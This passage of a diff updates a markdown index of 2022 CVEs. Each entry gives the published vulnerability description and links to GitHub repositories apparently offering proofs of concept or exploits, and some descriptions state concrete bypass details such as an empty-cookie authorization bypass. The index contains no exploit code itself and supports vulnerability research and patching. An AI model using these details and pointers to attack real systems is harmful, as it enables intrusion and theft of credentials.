[MuallimNaci/CVE-2022-30887](https://github.com/MuallimNaci/CVE-2022-30887) + +### CVE-2022-30929 (2022-07-06) + +Mini-Tmall v1.0 is vulnerable to Insecure Permissions via tomcat-embed-jasper. + + +- [nanaao/CVE-2022-30929](https://github.com/nanaao/CVE-2022-30929) + +### CVE-2022-31007 (2022-05-31) + +eLabFTW is an electronic lab notebook manager for research teams. Prior to version 4.3.0, a vulnerability allows an authenticated user with an administrator role in a team to assign itself system administrator privileges within the application, or create a new system administrator account. The issue has been corrected in eLabFTW version 4.3.0. In the context of eLabFTW, an administrator is a user account with certain privileges to manage users and content in their assigned team/teams. A system administrator account can manage all accounts, teams and edit system-wide settings within the application. The impact is not deemed as high, as it requires the attacker to have access to an administrator account. Regular user accounts cannot exploit this to gain admin rights. A workaround for one if the issues is removing the ability of administrators to create accounts. + + +- [gregscharf/CVE-2022-31007-Python-POC](https://github.com/gregscharf/CVE-2022-31007-Python-POC) + +### CVE-2022-31061 (2022-06-28) + +GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. + + +- [Wangyanan131/CVE-2022-31061](https://github.com/Wangyanan131/CVE-2022-31061) + +### CVE-2022-31101 (2022-06-27) + +prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue. + + +- [MathiasReker/blmvuln](https://github.com/MathiasReker/blmvuln) +- [karthikuj/CVE-2022-31101](https://github.com/karthikuj/CVE-2022-31101) + +### CVE-2022-31138 (2022-07-11) + +mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings. + + +- [ly1g3/Mailcow-CVE-2022-31138](https://github.com/ly1g3/Mailcow-CVE-2022-31138) + +### CVE-2022-31144 (2022-07-19) + +Redis is an in-memory database that persists on disk. A specially crafted `XAUTOCLAIM` command on a stream key in a specific state may result with heap overflow, and potentially remote code execution. This problem affects versions on the 7.x branch prior to 7.0.4. The patch is released in version 7.0.4. + + +- [SpiralBL0CK/CVE-2022-31144](https://github.com/SpiralBL0CK/CVE-2022-31144) + +### CVE-2022-31181 (2022-08-01) + +PrestaShop is an Open Source e-commerce platform. In versions from 1.6.0.10 and before 1.7.8.7 PrestaShop is subject to an SQL injection vulnerability which can be chained to call PHP's Eval function on attacker input. The problem is fixed in version 1.7.8.7. Users are advised to upgrade. Users unable to upgrade may delete the MySQL Smarty cache feature. + + +- [drkbcn/lblfixer_cve_2022_31181](https://github.com/drkbcn/lblfixer_cve_2022_31181) + +### CVE-2022-31188 (2022-08-01) + +CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. There are no known workarounds for this issue. + + +- [emirpolatt/CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188) + ### CVE-2022-31245 (2022-05-20) mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs. @@ -1614,6 +20704,21 @@ - [ly1g3/Mailcow-CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245) +### CVE-2022-31262 (2022-08-17) + +An exploitable local privilege escalation vulnerability exists in GOG Galaxy 2.0.46. Due to insufficient folder permissions, an attacker can hijack the %ProgramData%\GOG.com folder structure and change the GalaxyCommunication service executable to a malicious file, resulting in code execution as SYSTEM. + + +- [secure-77/CVE-2022-31262](https://github.com/secure-77/CVE-2022-31262) + +### CVE-2022-31269 (2022-08-25) + +Nortek Linear eMerge E3-Series devices through 0.32-09c place admin credentials in /test.txt that allow an attacker to open a building's doors. (This occurs in situations where the CVE-2019-7271 default credentials have been changed.) + + +- [Henry4E36/CVE-2022-31269](https://github.com/Henry4E36/CVE-2022-31269) +- [omarhashem123/CVE-2022-31269](https://github.com/omarhashem123/CVE-2022-31269) + ### CVE-2022-31294 (2022-06-16) An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts. @@ -1680,8 +20785,136 @@ - [IbrahimEkimIsik/CVE-2022-31403](https://github.com/IbrahimEkimIsik/CVE-2022-31403) +### CVE-2022-31479 (2022-06-06) + +An unauthenticated attacker can update the hostname with a specially crafted name that will allow for shell commands to be executed during the core collection process. This vulnerability impacts products based on HID Mercury Intelligent Controllers LP1501, LP1502, LP2500, LP4502, and EP4502 which contain firmware versions prior to 1.302 for the LP series and 1.296 for the EP series. An attacker with this level of access on the device can monitor all communications sent to and from this device, modify onboard relays, change configuration files, or cause the device to become unstable. The injected commands only get executed during start up or when unsafe calls regarding the hostname are used. This allows the attacker to gain remote access to the device and can make their persistence permanent by modifying the filesystem. + + +- [realyme/CVE-2022-31479-test](https://github.com/realyme/CVE-2022-31479-test) + +### CVE-2022-31499 (2022-08-25) + +Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256. + + +- [omarhashem123/CVE-2022-31499](https://github.com/omarhashem123/CVE-2022-31499) + +### CVE-2022-31626 (2022-06-16) + +In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability. + + +- [amitlttwo/CVE-2022-31626](https://github.com/amitlttwo/CVE-2022-31626) + +### CVE-2022-31629 (2022-09-28) + +In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications. + + +- [silnex/CVE-2022-31629-poc](https://github.com/silnex/CVE-2022-31629-poc) + +### CVE-2022-31691 (2022-11-04) + +Spring Tools 4 for Eclipse version 4.16.0 and below as well as VSCode extensions such as Spring Boot Tools, Concourse CI Pipeline Editor, Bosh Editor and Cloudfoundry Manifest YML Support version 1.39.0 and below all use Snakeyaml library for YAML editing support. This library allows for some special syntax in the YAML that under certain circumstances allows for potentially harmful remote code execution by the attacker. + + +- [SpindleSec/CVE-2022-31691](https://github.com/SpindleSec/CVE-2022-31691) + +### CVE-2022-31692 (2022-10-31) + +Spring Security, versions 5.7 prior to 5.7.5 and 5.6 prior to 5.6.9 could be susceptible to authorization rules bypass via forward or include dispatcher types. Specifically, an application is vulnerable when all of the following are true: The application expects that Spring Security applies security to forward and include dispatcher types. The application uses the AuthorizationFilter either manually or via the authorizeHttpRequests() method. The application configures the FilterChainProxy to apply to forward and/or include requests (e.g. spring.security.filter.dispatcher-types = request, error, async, forward, include). The application may forward or include the request to a higher privilege-secured endpoint.The application configures Spring Security to apply to every dispatcher type via authorizeHttpRequests().shouldFilterAllDispatcherTypes(true) + + +- [SpindleSec/cve-2022-31692](https://github.com/SpindleSec/cve-2022-31692) +- [hotblac/cve-2022-31692](https://github.com/hotblac/cve-2022-31692) + +### CVE-2022-31705 (2022-12-14) + +VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed. + + +- [s0duku/cve-2022-31705](https://github.com/s0duku/cve-2022-31705) + ### CVE-2022-31749 - [jbaines-r7/hook](https://github.com/jbaines-r7/hook) +- [iveresk/cve-2022-31749](https://github.com/iveresk/cve-2022-31749) + +### CVE-2022-31793 (2022-08-04) + +do_request in request.c in muhttpd before 1.1.7 allows remote attackers to read arbitrary files by constructing a URL with a single character before a desired path on the filesystem. This occurs because the code skips over the first character when serving files. Arris NVG443, NVG599, NVG589, and NVG510 devices and Arris-derived BGW210 and BGW320 devices are affected. + + +- [xpgdgit/CVE-2022-31793](https://github.com/xpgdgit/CVE-2022-31793) + +### CVE-2022-31798 (2022-08-25) + +Nortek Linear eMerge E3-Series 0.32-07p devices are vulnerable to /card_scan.php?CardFormatNo= XSS with session fixation (via PHPSESSID) when they are chained together. This would allow an attacker to take over an admin account or a user account. + + +- [omarhashem123/CVE-2022-31798](https://github.com/omarhashem123/CVE-2022-31798) + +### CVE-2022-31814 (2022-09-05) + +pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + + +- [EvergreenCartoons/SenselessViolence](https://github.com/EvergreenCartoons/SenselessViolence) +- [Madliife0/CVE-2022-31814](https://github.com/Madliife0/CVE-2022-31814) +- [TheUnknownSoul/CVE-2022-31814](https://github.com/TheUnknownSoul/CVE-2022-31814) +- [drcayber/RCE](https://github.com/drcayber/RCE) +- [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814) +- [dkstar11q/CVE-2022-31814](https://github.com/dkstar11q/CVE-2022-31814) +- [Laburity/CVE-2022-31814](https://github.com/Laburity/CVE-2022-31814) +- [ArunHAtter/CVE-2022-31814](https://github.com/ArunHAtter/CVE-2022-31814) + +### CVE-2022-31854 (2022-07-07) + +Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel. + + +- [Vikaran101/CVE-2022-31854](https://github.com/Vikaran101/CVE-2022-31854) + +### CVE-2022-31889 (2023-04-05) + +Cross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae. + + +- [reewardius/CVE-2022-31889](https://github.com/reewardius/CVE-2022-31889) + +### CVE-2022-31890 (2023-04-05) + +SQL Injection vulnerability in audit/class.audit.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae via the order parameter to the getOrder function. + + +- [reewardius/CVE-2022-31890](https://github.com/reewardius/CVE-2022-31890) + +### CVE-2022-31897 (2022-06-29) + +SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=. + + +- [angelopioamirante/CVE-2022-31897](https://github.com/angelopioamirante/CVE-2022-31897) + +### CVE-2022-31898 (2022-10-27) + +gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters. + + +- [gigaryte/cve-2022-31898](https://github.com/gigaryte/cve-2022-31898) + +### CVE-2022-31901 (2023-01-19) + +Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files. + + +- [CDACesec/CVE-2022-31901](https://github.com/CDACesec/CVE-2022-31901) + +### CVE-2022-31902 (2023-02-01) + +Notepad++ v8.4.1 was discovered to contain a stack overflow via the component Finder::add(). + + +- [CDACesec/CVE-2022-31902](https://github.com/CDACesec/CVE-2022-31902) ### CVE-2022-31983 (2022-06-01) @@ -1697,6 +20930,27 @@ - [heavenswill/CVE-2022-32013](https://github.com/heavenswill/CVE-2022-32013) +### CVE-2022-32060 (2022-07-07) + +An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file. + + +- [bypazs/CVE-2022-32060](https://github.com/bypazs/CVE-2022-32060) + +### CVE-2022-32073 (2022-07-13) + +WolfSSH v1.4.7 was discovered to contain an integer overflow via the function wolfSSH_SFTP_RecvRMDIR. + + +- [mgregus/project_BIT_nmap_script](https://github.com/mgregus/project_BIT_nmap_script) + +### CVE-2022-32074 (2022-07-13) + +A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file. + + +- [reewardius/CVE-2022-32074](https://github.com/reewardius/CVE-2022-32074) + ### CVE-2022-32114 (2022-07-13) An unrestricted file upload vulnerability in the Add New Assets function of Strapi 4.1.12 allows attackers to conduct XSS attacks via a crafted PDF file. NOTE: the project documentation suggests that a user with the Media Library "Create (upload)" permission is supposed to be able to upload PDF files containing JavaScript, and that all files in a public assets folder are accessible to the outside world (unless the filename begins with a dot character). The administrator can choose to allow only image, video, and audio files (i.e., not PDF) if desired. @@ -1718,6 +20972,48 @@ - [JC175/CVE-2022-32119](https://github.com/JC175/CVE-2022-32119) +### CVE-2022-32132 +- [reewardius/CVE-2022-32132](https://github.com/reewardius/CVE-2022-32132) + +### CVE-2022-32199 (2023-03-27) + +db_convert.php in ScriptCase through 9.9.008 is vulnerable to Arbitrary File Deletion by an admin via a directory traversal sequence in the file parameter. + + +- [Toxich4/CVE-2022-32199](https://github.com/Toxich4/CVE-2022-32199) + +### CVE-2022-32206 (2022-07-07) + +curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a "malloc bomb", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. + + +- [HimanshuS67/external_curl_AOSP10_CVE-2022-32206](https://github.com/HimanshuS67/external_curl_AOSP10_CVE-2022-32206) + +### CVE-2022-32223 (2022-07-14) + +Node.js is vulnerable to Hijack Execution Flow: DLL Hijacking under certain conditions on Windows platforms.This vulnerability can be exploited if the victim has the following dependencies on a Windows machine:* OpenSSL has been installed and “C:\Program Files\Common Files\SSL\openssl.cnf” exists.Whenever the above conditions are present, `node.exe` will search for `providers.dll` in the current user directory.After that, `node.exe` will try to search for `providers.dll` by the DLL Search Order in Windows.It is possible for an attacker to place the malicious file `providers.dll` under a variety of paths and exploit this vulnerability. + + +- [ianyong/cve-2022-32223](https://github.com/ianyong/cve-2022-32223) + +### CVE-2022-32224 (2022-12-05) + +A possible escalation to RCE vulnerability exists when using YAML serialized columns in Active Record < 7.0.3.1, <6.1.6.1, <6.0.5.1 and <5.2.8.1 which could allow an attacker, that can manipulate data in the database (via means like SQL injection), the ability to escalate to an RCE. + + +- [ooooooo-q/cve-2022-32224-rails](https://github.com/ooooooo-q/cve-2022-32224-rails) + +### CVE-2022-32250 (2022-06-02) + +net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free. + + +- [theori-io/CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit) +- [ysanatomic/CVE-2022-32250-LPE](https://github.com/ysanatomic/CVE-2022-32250-LPE) +- [Decstor5/2022-32250LPE](https://github.com/Decstor5/2022-32250LPE) +- [Kristal-g/CVE-2022-32250](https://github.com/Kristal-g/CVE-2022-32250) +- [seadragnol/CVE-2022-32250](https://github.com/seadragnol/CVE-2022-32250) + ### CVE-2022-32532 (2022-06-28) Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass. @@ -1725,6 +21021,63 @@ - [Lay0us/CVE-2022-32532](https://github.com/Lay0us/CVE-2022-32532) +### CVE-2022-32548 (2022-08-29) + +An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field. + + +- [MosaedH/CVE-2022-32548-RCE-POC](https://github.com/MosaedH/CVE-2022-32548-RCE-POC) + +### CVE-2022-32832 (2022-09-23) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app with root privileges may be able to execute arbitrary code with kernel privileges. + + +- [Muirey03/CVE-2022-32832](https://github.com/Muirey03/CVE-2022-32832) +- [AkbarTrilaksana/CVE-2022-32832](https://github.com/AkbarTrilaksana/CVE-2022-32832) + +### CVE-2022-32862 (2022-11-01) + +This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.7.1, macOS Ventura 13, macOS Monterey 12.6.1. An app with root privileges may be able to access private information. + + +- [rohitc33/CVE-2022-32862](https://github.com/rohitc33/CVE-2022-32862) + +### CVE-2022-32883 (2022-09-20) + +A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An app may be able to read sensitive location information. + + +- [breakpointHQ/CVE-2022-32883](https://github.com/breakpointHQ/CVE-2022-32883) + +### CVE-2022-32898 (2022-11-01) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7 and iPadOS 15.7, iOS 16, macOS Ventura 13, watchOS 9. An app may be able to execute arbitrary code with kernel privileges. + + +- [ox1111/CVE-2022-32898](https://github.com/ox1111/CVE-2022-32898) + +### CVE-2022-32932 (2022-11-01) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, iOS 16.1 and iPadOS 16, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges. + + +- [ox1111/CVE-2022-32932](https://github.com/ox1111/CVE-2022-32932) + +### CVE-2022-32947 (2022-11-01) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 16.1 and iPadOS 16, macOS Ventura 13, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges. + + +- [asahilina/agx-exploit](https://github.com/asahilina/agx-exploit) + +### CVE-2022-32981 (2022-06-10) + +An issue was discovered in the Linux kernel through 5.18.3 on powerpc 32-bit platforms. There is a buffer overflow in ptrace PEEKUSER and POKEUSER (aka PEEKUSR and POKEUSR) when accessing floating point registers. + + +- [SpiralBL0CK/CVE-2022-32981](https://github.com/SpiralBL0CK/CVE-2022-32981) + ### CVE-2022-32988 (2022-06-30) Cross Site Scripting (XSS) vulnerability in router Asus DSL-N14U-B1 1.1.2.3_805 via the "*list" parameters (e.g. filter_lwlist, keyword_rulelist, etc) in every ".asp" page containing a list of stored strings. The following asp files are affected: (1) cgi-bin/APP_Installation.asp, (2) cgi-bin/Advanced_ACL_Content.asp, (3) cgi-bin/Advanced_ADSL_Content.asp, (4) cgi-bin/Advanced_ASUSDDNS_Content.asp, (5) cgi-bin/Advanced_AiDisk_ftp.asp, (6) cgi-bin/Advanced_AiDisk_samba.asp, (7) cgi-bin/Advanced_DSL_Content.asp, (8) cgi-bin/Advanced_Firewall_Content.asp, (9) cgi-bin/Advanced_FirmwareUpgrade_Content.asp, (10) cgi-bin/Advanced_GWStaticRoute_Content.asp, (11) cgi-bin/Advanced_IPTV_Content.asp, (12) cgi-bin/Advanced_IPv6_Content.asp, (13) cgi-bin/Advanced_KeywordFilter_Content.asp, (14) cgi-bin/Advanced_LAN_Content.asp, (15) cgi-bin/Advanced_Modem_Content.asp, (16) cgi-bin/Advanced_PortTrigger_Content.asp, (17) cgi-bin/Advanced_QOSUserPrio_Content.asp, (18) cgi-bin/Advanced_QOSUserRules_Content.asp, (19) cgi-bin/Advanced_SettingBackup_Content.asp, (20) cgi-bin/Advanced_System_Content.asp, (21) cgi-bin/Advanced_URLFilter_Content.asp, (22) cgi-bin/Advanced_VPN_PPTP.asp, (23) cgi-bin/Advanced_VirtualServer_Content.asp, (24) cgi-bin/Advanced_WANPort_Content.asp, (25) cgi-bin/Advanced_WAdvanced_Content.asp, (26) cgi-bin/Advanced_WMode_Content.asp, (27) cgi-bin/Advanced_WWPS_Content.asp, (28) cgi-bin/Advanced_Wireless_Content.asp, (29) cgi-bin/Bandwidth_Limiter.asp, (30) cgi-bin/Guest_network.asp, (31) cgi-bin/Main_AccessLog_Content.asp, (32) cgi-bin/Main_AdslStatus_Content.asp, (33) cgi-bin/Main_Spectrum_Content.asp, (34) cgi-bin/Main_WebHistory_Content.asp, (35) cgi-bin/ParentalControl.asp, (36) cgi-bin/QIS_wizard.asp, (37) cgi-bin/QoS_EZQoS.asp, (38) cgi-bin/aidisk.asp, (39) cgi-bin/aidisk/Aidisk-1.asp, (40) cgi-bin/aidisk/Aidisk-2.asp, (41) cgi-bin/aidisk/Aidisk-3.asp, (42) cgi-bin/aidisk/Aidisk-4.asp, (43) cgi-bin/blocking.asp, (44) cgi-bin/cloud_main.asp, (45) cgi-bin/cloud_router_sync.asp, (46) cgi-bin/cloud_settings.asp, (47) cgi-bin/cloud_sync.asp, (48) cgi-bin/device-map/DSL_dashboard.asp, (49) cgi-bin/device-map/clients.asp, (50) cgi-bin/device-map/disk.asp, (51) cgi-bin/device-map/internet.asp, (52) cgi-bin/error_page.asp, (53) cgi-bin/index.asp, (54) cgi-bin/index2.asp, (55) cgi-bin/qis/QIS_PTM_manual_setting.asp, (56) cgi-bin/qis/QIS_admin_pass.asp, (57) cgi-bin/qis/QIS_annex_setting.asp, (58) cgi-bin/qis/QIS_bridge_cfg_tmp.asp, (59) cgi-bin/qis/QIS_detect.asp, (60) cgi-bin/qis/QIS_finish.asp, (61) cgi-bin/qis/QIS_ipoa_cfg_tmp.asp, (62) cgi-bin/qis/QIS_manual_setting.asp, (63) cgi-bin/qis/QIS_mer_cfg.asp, (64) cgi-bin/qis/QIS_mer_cfg_tmp.asp, (65) cgi-bin/qis/QIS_ppp_cfg.asp, (66) cgi-bin/qis/QIS_ppp_cfg_tmp.asp, (67) cgi-bin/qis/QIS_wireless.asp, (68) cgi-bin/query_wan_status.asp, (69) cgi-bin/query_wan_status2.asp, and (70) cgi-bin/start_apply.asp. @@ -1732,6 +21085,65 @@ - [FedericoHeichou/CVE-2022-32988](https://github.com/FedericoHeichou/CVE-2022-32988) +### CVE-2022-33075 (2022-07-05) + +A stored cross-site scripting (XSS) vulnerability in the Add Classification function of Zoo Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via unspecified vectors. + + +- [angelopioamirante/CVE-2022-33075](https://github.com/angelopioamirante/CVE-2022-33075) + +### CVE-2022-33082 (2022-06-30) + +An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input. + + +- [cyberqueenmeg/cve-2022-33082-exploit](https://github.com/cyberqueenmeg/cve-2022-33082-exploit) + +### CVE-2022-33174 (2022-06-13) + +Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + + +- [Henry4E36/CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174) + +### CVE-2022-33679 (2022-09-13) + +Windows Kerberos Elevation of Privilege Vulnerability + + +- [Bdenneu/CVE-2022-33679](https://github.com/Bdenneu/CVE-2022-33679) +- [Blyth0He/CVE-2022-33679](https://github.com/Blyth0He/CVE-2022-33679) +- [Amulab/CVE-2022-33679](https://github.com/Amulab/CVE-2022-33679) +- [notareaperbutDR34P3r/Kerberos_CVE-2022-33679](https://github.com/notareaperbutDR34P3r/Kerberos_CVE-2022-33679) + +### CVE-2022-33891 (2022-07-18) + +The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. + + +- [W01fh4cker/cve-2022-33891](https://github.com/W01fh4cker/cve-2022-33891) +- [HuskyHacks/cve-2022-33891](https://github.com/HuskyHacks/cve-2022-33891) +- [nanaao/CVE-2022-33891](https://github.com/nanaao/CVE-2022-33891) +- [AkbarTrilaksana/cve-2022-33891](https://github.com/AkbarTrilaksana/cve-2022-33891) +- [llraudseppll/cve-2022-33891](https://github.com/llraudseppll/cve-2022-33891) +- [AmoloHT/CVE-2022-33891](https://github.com/AmoloHT/CVE-2022-33891) +- [DrLinuxOfficial/CVE-2022-33891](https://github.com/DrLinuxOfficial/CVE-2022-33891) +- [Vulnmachines/Apache-spark-CVE-2022-33891](https://github.com/Vulnmachines/Apache-spark-CVE-2022-33891) +- [ps-interactive/lab_security_apache_spark_emulation_detection](https://github.com/ps-interactive/lab_security_apache_spark_emulation_detection) +- [elsvital/cve-2022-33891-fix](https://github.com/elsvital/cve-2022-33891-fix) +- [K3ysTr0K3R/CVE-2022-33891-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-33891-EXPLOIT) + +### CVE-2022-33980 (2022-07-06) + +Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default. + + +- [tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE) +- [HKirito/CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980) +- [sammwyy/CVE-2022-33980-POC](https://github.com/sammwyy/CVE-2022-33980-POC) +- [P0lar1ght/CVE-2022-33980-POC](https://github.com/P0lar1ght/CVE-2022-33980-POC) +- [joseluisinigo/riskootext4shell](https://github.com/joseluisinigo/riskootext4shell) + ### CVE-2022-34024 (2022-07-19) Barangay Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the resident module editing function at /bmis/pages/resident/resident.php. @@ -1739,6 +21151,24 @@ - [sorabug/bug_report](https://github.com/sorabug/bug_report) +### CVE-2022-34169 (2022-07-19) + +The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan. + + +- [bor8/CVE-2022-34169](https://github.com/bor8/CVE-2022-34169) +- [flowerwind/AutoGenerateXalanPayload](https://github.com/flowerwind/AutoGenerateXalanPayload) + +### CVE-2022-34265 (2022-07-04) + +An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. + + +- [aeyesec/CVE-2022-34265](https://github.com/aeyesec/CVE-2022-34265) +- [traumatising/CVE-2022-34265](https://github.com/traumatising/CVE-2022-34265) +- [ZhaoQi99/CVE-2022-34265](https://github.com/ZhaoQi99/CVE-2022-34265) +- [lnwza0x0a/CTF_Django_CVE-2022-34265](https://github.com/lnwza0x0a/CTF_Django_CVE-2022-34265) + ### CVE-2022-34298 (2022-06-22) The NT auth module in OpenAM before 14.6.6 allows a "replace Samba username attack." @@ -1746,6 +21176,73 @@ - [watchtowrlabs/CVE-2022-34298](https://github.com/watchtowrlabs/CVE-2022-34298) +### CVE-2022-34527 (2022-07-29) + +D-Link DSL-3782 v1.03 and below was discovered to contain a command injection vulnerability via the function byte_4C0160. + + +- [FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection) + +### CVE-2022-34556 (2022-07-28) + +PicoC v3.2.2 was discovered to contain a NULL pointer dereference at variable.c. + + +- [Halcy0nic/CVE-2022-34556](https://github.com/Halcy0nic/CVE-2022-34556) + +### CVE-2022-34683 (2022-12-30) + +NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service. + + +- [gmh5225/CVE-2022-34683](https://github.com/gmh5225/CVE-2022-34683) + +### CVE-2022-34715 (2022-08-09) + +Windows Network File System Remote Code Execution Vulnerability + + +- [Starssgo/CVE-2022-34715-POC](https://github.com/Starssgo/CVE-2022-34715-POC) + +### CVE-2022-34718 (2022-09-13) + +Windows TCP/IP Remote Code Execution Vulnerability + + +- [SecLabResearchBV/CVE-2022-34718-PoC](https://github.com/SecLabResearchBV/CVE-2022-34718-PoC) + +### CVE-2022-34753 (2022-07-13) + +A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products: SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior) + + +- 